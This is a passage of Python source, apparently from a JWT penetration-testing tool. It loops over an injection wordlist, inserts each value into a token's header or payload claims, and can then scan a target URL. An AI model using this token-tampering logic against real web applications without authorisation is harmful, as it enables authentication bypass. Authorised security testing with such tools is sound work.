valLst.readline() 2073 | cprintc("Generating tokens from injection file...", "cyan") 2074 | utf8errors = 0 2075 | wordcount = 0 2076 | while nextVal: 2077 | if injectionfile[0] == "payload": 2078 | newpaylDict, newPaylB64 = injectpayloadclaim(injectionfile[1], nextVal.rstrip()) 2079 | newContents = genContents(headDict, newpaylDict) 2080 | headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) 2081 | paylB64 = newPaylB64 2082 | elif injectionfile[0] == "header": 2083 | newheadDict, newHeadB64 = injectheaderclaim(injectionfile[1], nextVal.rstrip()) 2084 | newContents = genContents(newheadDict, paylDict) 2085 | headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) 2086 | injectOut(newheadDict, newpaylDict) 2087 | nextVal = valLst.readline() 2088 | exit(1) 2089 | else: 2090 | if not args.mode: 2091 | injectOut(newheadDict, newpaylDict) 2092 | exit(1) 2093 | if args.mode: 2094 | if not config['argvals']['targeturl'] and not args.bare: 2095 | cprintc("No target secified (-t), cannot scan offline.", "red") 2096 | exit(1) 2097 | runScanning() 2098 | runActions() 2099 | exit(1) 2100 | --------------------------------------------------------------------------------